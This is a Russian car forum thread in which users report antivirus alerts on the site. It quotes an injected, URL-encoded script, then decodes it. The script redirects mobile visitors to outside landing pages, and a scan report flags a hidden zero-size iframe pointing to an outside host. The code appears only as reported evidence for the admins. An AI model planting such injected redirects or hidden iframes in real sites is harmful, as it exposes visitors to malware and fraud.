Страница 2 из 2
Nsk
ZF_Turbo
Касперыч всё равно ругается Pardon
ZF_Turbo
Всем у кого ещё ругается обновите кэш - Ctrl + F5
Garrison
Снова вирус, снова каспер сечёт.
Судя по всему, в одном из рекламных баннеров.
ZF_Turbo
Garrison
Снова почистили...
Angelier®
Админы, проверьте код на главной странице

<span class="genmed">Дискуссионный клуб.
Ведущий - ветеран Ваза, один из основателей проекта LADAONLINE Юрий Кузьмич Целиков



<script type="text/javascript">document.write(unescape("%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%69%73%6D%6F%62%69%6C%65%3D%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%6D%61%74%63%68%28%2F%28%61%6E%64%72%6F%69%64%29%2F%69%29%3B%0A%69%66%20%28%69%73%6D%6F%62%69%6C%65%29%0A%7B%0A%09%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%61%70%6C%79%2E%72%75%2F%6C%61%6E%64%2E%70%68%70%3F%73%3D%32%35%36%33%26%61%3D%61%74%64%73%26%6C%3D%61%6F%73%5B%32%38%2C%35%35%2C%34%34%2C%34%30%2C%33%32%2C%35%36%5D%22%3B%0A%7D%3B%3C%2F%73%63%72%69%70%74%3E"));</script><br />
</span><span class="gensmall">Модераторы <noindex><a rel="nofollow" href="profile.php?mode=viewprofile&amp;u=20104">Lednik</a></noindex>, <noindex><a rel="nofollow" href="profile.php?mode=viewprofile&amp;u=67698">Kuzmich2</a></noindex>, <noindex><a rel="nofollow" href="profile.php?mode=viewprofile&amp;u=72872">Thomas</a></noindex></span></td>


UPD

Раскодировал:

Код:

<script type="text/javascript">document.write(unescape("<script type="text/javascript">var ismobile=navigator.userAgent.match(/(android)/i):
if (ismobile)
{
   document.location.href="http://waply.ru/land.php?s=2563&a=atds&l=aos[28,55,44,40,32,56]";
};
</script>
));
</script>

ZF_Turbo
Angelier®
Спасибо, пофиксили.
Angelier®
Админы, не спим!!!!!
Главная:
Код:

<script type="text/javascript">document.write(unescape("<script type="text/javascript">var ismobile=navigator.userAgent.match(/(acs)|(alav)|(alca)|(amoi)|(audi)|(aste)|(avan)|(benq)|(bird)|(blac)|(blaz)|(brew)|(cell)|(cldc)|(cmd-)|(dang)|(doco)|(eric)|(hipt)|(inno)|(ipaq)|(java)|(jigs)|(kddi)|(keji)|(leno)|(lg-c)|(lg-d)|(lg-g)|(lge-)|(maui)|(maxo)|(midp)|(mits)|(mmef)|(mobi)|(mot-)|(moto)|(mwbp)|(nec-)|(newt)|(noki)|(opwv)|(palm)|(pana)|(pant)|(pdxg)|(phil)|(play)|(pluc)|(port)|(prox)|(qtek)|(qwap)|(sage)|(sams)|(sany)|(sch-)|(sec-)|(send)|(seri)|(sgh-)|(shar)|(sie-)|(siem)|(smal)|(smar)|(sony)|(sph-)|(symb)|(t-mo)|(teli)|(tim-)|(tosh)|(tsm-)|(upg1)|(upsi)|(vk-v)|(voda)|(w3cs)|(wap-)|(wapa)|(wapi)|(wapp)|(wapr)|(webc)|(winw)|(winw)|(xda)|(xda-)|(up.browser)|(up.link)|(windows.ce)|(iemobile)|(mini)|(mmp)|(symbian)|(midp)|(wap)|(phone)|(pocket)|(mobile)|(android)|(pda)|(PPC)|(Series60)|(Opera.Mini)|(ipad)|(iphone)/i);
var not4=navigator.userAgent.match(/(android)/i);
if (ismobile&&!not4)
{
   document.location.href="http://mobi-co.in/land.php?s=2515&a=atds&l=ios[47,49,50,32,41,13,56]oos[56,31,55]";
};</script>"));</script><br />



Сам скрипт, для наглядности:
Код:

<td class="row1" width="100%" height="50"><span class="forumlink"> <a href="viewforum.php?f=31" class="forumlink">Ветеран ВАЗа отвечает ФОРУМЧАНАМ</a><br />
     </span> <span class="genmed">Дискуссионный клуб.
Ведущий - ветеран Ваза, один из основателей проекта LADAONLINE Юрий Кузьмич Целиков<script type="text/javascript">document.write(unescape("%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%69%73%6D%6F%62%69%6C%65%3D%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%6D%61%74%63%68%28%2F%28%61%63%73%29%7C%28%61%6C%61%76%29%7C%28%61%6C%63%61%29%7C%28%61%6D%6F%69%29%7C%28%61%75%64%69%29%7C%28%61%73%74%65%29%7C%28%61%76%61%6E%29%7C%28%62%65%6E%71%29%7C%28%62%69%72%64%29%7C%28%62%6C%61%63%29%7C%28%62%6C%61%7A%29%7C%28%62%72%65%77%29%7C%28%63%65%6C%6C%29%7C%28%63%6C%64%63%29%7C%28%63%6D%64%2D%29%7C%28%64%61%6E%67%29%7C%28%64%6F%63%6F%29%7C%28%65%72%69%63%29%7C%28%68%69%70%74%29%7C%28%69%6E%6E%6F%29%7C%28%69%70%61%71%29%7C%28%6A%61%76%61%29%7C%28%6A%69%67%73%29%7C%28%6B%64%64%69%29%7C%28%6B%65%6A%69%29%7C%28%6C%65%6E%6F%29%7C%28%6C%67%2D%63%29%7C%28%6C%67%2D%64%29%7C%28%6C%67%2D%67%29%7C%28%6C%67%65%2D%29%7C%28%6D%61%75%69%29%7C%28%6D%61%78%6F%29%7C%28%6D%69%64%70%29%7C%28%6D%69%74%73%29%7C%28%6D%6D%65%66%29%7C%28%6D%6F%62%69%29%7C%28%6D%6F%74%2D%29%7C%28%6D%6F%74%6F%29%7C%28%6D%77%62%70%29%7C%28%6E%65%63%2D%29%7C%28%6E%65%77%74%29%7C%28%6E%6F%6B%69%29%7C%28%6F%70%77%76%29%7C%28%70%61%6C%6D%29%7C%28%70%61%6E%61%29%7C%28%70%61%6E%74%29%7C%28%70%64%78%67%29%7C%28%70%68%69%6C%29%7C%28%70%6C%61%79%29%7C%28%70%6C%75%63%29%7C%28%70%6F%72%74%29%7C%28%70%72%6F%78%29%7C%28%71%74%65%6B%29%7C%28%71%77%61%70%29%7C%28%73%61%67%65%29%7C%28%73%61%6D%73%29%7C%28%73%61%6E%79%29%7C%28%73%63%68%2D%29%7C%28%73%65%63%2D%29%7C%28%73%65%6E%64%29%7C%28%73%65%72%69%29%7C%28%73%67%68%2D%29%7C%28%73%68%61%72%29%7C%28%73%69%65%2D%29%7C%28%73%69%65%6D%29%7C%28%73%6D%61%6C%29%7C%28%73%6D%61%72%29%7C%28%73%6F%6E%79%29%7C%28%73%70%68%2D%29%7C%28%73%79%6D%62%29%7C%28%74%2D%6D%6F%29%7C%28%74%65%6C%69%29%7C%28%74%69%6D%2D%29%7C%28%74%6F%73%68%29%7C%28%74%73%6D%2D%29%7C%28%75%70%67%31%29%7C%28%75%70%73%69%29%7C%28%76%6B%2D%76%29%7C%28%76%6F%64%61%29%7C%28%77%33%63%73%29%7C%28%77%61%70%2D%29%7C%28%77%61%70%61%29%7C%28%77%61%70%69%29%7C%28%77%61%70%70%29%7C%28%77%61%70%72%29%7C%28%77%65%62%63%29%7C%28%77%69%6E%77%29%7C%28%77%69%6E%77%29%7C%28%78%64%61%29%7C%28%78%64%61%2D%29%7C%28%75%70%2E%62%72%6F%77%73%65%72%29%7C%28%75%70%2E%6C%69%6E%6B%29%7C%28%77%69%6E%64%6F%77%73%2E%63%65%29%7C%28%69%65%6D%6F%62%69%6C%65%29%7C%28%6D%69%6E%69%29%7C%28%6D%6D%70%29%7C%28%73%79%6D%62%69%61%6E%29%7C%28%6D%69%64%70%29%7C%28%77%61%70%29%7C%28%70%68%6F%6E%65%29%7C%28%70%6F%63%6B%65%74%29%7C%28%6D%6F%62%69%6C%65%29%7C%28%61%6E%64%72%6F%69%64%29%7C%28%70%64%61%29%7C%28%50%50%43%29%7C%28%53%65%72%69%65%73%36%30%29%7C%28%4F%70%65%72%61%2E%4D%69%6E%69%29%7C%28%69%70%61%64%29%7C%28%69%70%68%6F%6E%65%29%2F%69%29%3B%0A%76%61%72%20%6E%6F%74%34%3D%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%6D%61%74%63%68%28%2F%28%61%6E%64%72%6F%69%64%29%2F%69%29%3B%0A%69%66%20%28%69%73%6D%6F%62%69%6C%65%26%26%21%6E%6F%74%34%29%0A%7B%0A%09%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6D%6F%62%69%2D%63%6F%2E%69%6E%2F%6C%61%6E%64%2E%70%68%70%3F%73%3D%32%35%31%35%26%61%3D%61%74%64%73%26%6C%3D%69%6F%73%5B%34%37%2C%34%39%2C%35%30%2C%33%32%2C%34%31%2C%31%33%2C%35%36%5D%6F%6F%73%5B%35%36%2C%33%31%2C%35%35%5D%22%3B%0A%7D%3B%3C%2F%73%63%72%69%70%74%3E"));</script><br />
     </span><span class="gensmall">Модераторы <noindex><a rel="nofollow" href="profile.php?mode=viewprofile&amp;u=20104">Lednik</a></noindex>, <noindex><a rel="nofollow" href="profile.php?mode=viewprofile&amp;u=67698">Kuzmich2</a></noindex>, <noindex><a rel="nofollow" href="profile.php?mode=viewprofile&amp;u=72872">Thomas</a></noindex></span></td>



Ищите дырку, или на FTP пароль разнюхали, или SQL инжекцию делают (что скорей)
Вадя™
спасибо, разберемся
Suse
Проверка сайта http://autolada.ru/

Дата проверки: 25/07/2012 07:58:44

Тип проверки: полная (antivirus-alarm + мировые антивирусные базы)

Список проверяемых файлов:

1. http://autolada.ru/, тип файла: html
• очень подозрительный код, скорее всего вирус:

<iframe src="http://tdass.16mb.com/main.php?site=9" width="0" height="0" frameborder="0"></iframe>

• содержит сомнительную ссылку по версии гугла: www.liveinternet.ru
2. http://autolada.ru/templates/main.js, тип файла: javascript

3. http://autolada.ru/templates/swfobject.js, тип файла: javascript

4. http://ladaonline.ru/jsout.php, тип файла: javascript

5. http://pic-bash.ru/jsout.php?num=4, тип файла: javascript

6. http://autolada.ru/templates/apgt.js, тип файла: javascript

7. http://tdass.16mb.com/main.php?site=9, тип файла: iframe html
• содержит сомнительную ссылку по версии гугла: www.liveinternet.ru

• Почему гугл считает сомнительным даже самого себя, читайте в нашей статье на krwork.ru »
LT
Что случилось? Пропадают сообщения. Т.е. как бы они есть, но по факту они пустые.
Suse
nestor
Kirill111
Пропадает всякое желание что-либо писать на такой замечательный форум, который раз в неделю откатывается на пару дней назад и трет все написанное. Курилка кер бы с ней, но люди пишут отчеты в профильных, стараются, тратят свое время, а из-за чьих-то кривых лап или невозможности сделать нормальную защиту все нафиг пропадает с завидной регулярностью. Один раз человек стерпит, два, а потом перестанет сюда писать что-либо объемное и полезное, в сети куча сайтов с менее криворукими админами. facepalm

Бэкап не делается элементарный пару раз в сутки? Откатить есть возможность не на два дня, а поближе? У меня например пропало несколько постов, на написание которых я вчера потратил минут 30 времени. facepalm
ZF_Turbo
Ничего не пропадает, это проблема после падания сервера. Все сообщения вернутся на место, после запуска проверки базы данных. Как будто первый раз прям.
realist
минут 5 назад:


Ошибка сервера
На веб-сайте произошла ошибка при получении http://autolada.ru/. Веб-сайт может быть закрыт на обслуживание или настроен неправильно.
Вот несколько советов и рекомендаций:
Обновите эту страницу позже.
Ошибка HTTP 500 (Internal Server Error): При попытке сервера выполнить запрос возникла неожиданная ситуация.

(многократно)
realist
снова многократные 500-ые ошибки. Товарищи, что с форумом?
ZF_Turbo
realist
Что за ошибки? Просто при серфинге?

Ни разу у меня не вылезло.
realist
ZF_Turbo
да, просто при серфинге. подробная ошибка сверху. 2 раза уже было с утра. просто в определенный момент перестаешь заходишь, получаешь ошибку, минут 5 держится-сколько ни обновляй, потом опять всё ок.
ZF_Turbo
Все потерянные сообщения снова видны.

realist
Я правил код сайта немного возможно из-за этого.
realist
ZF_Turbo
спасибо, ясно!
Новая тема Ответить на тему
Показать сообщения:
Страница 2 из 2
Перейти:
пїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅ пїЅпїЅ пїЅпїЅпїЅпїЅпїЅпїЅпїЅ пїЅ пїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅ

Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете вкладывать файлы
Вы можете скачивать файлы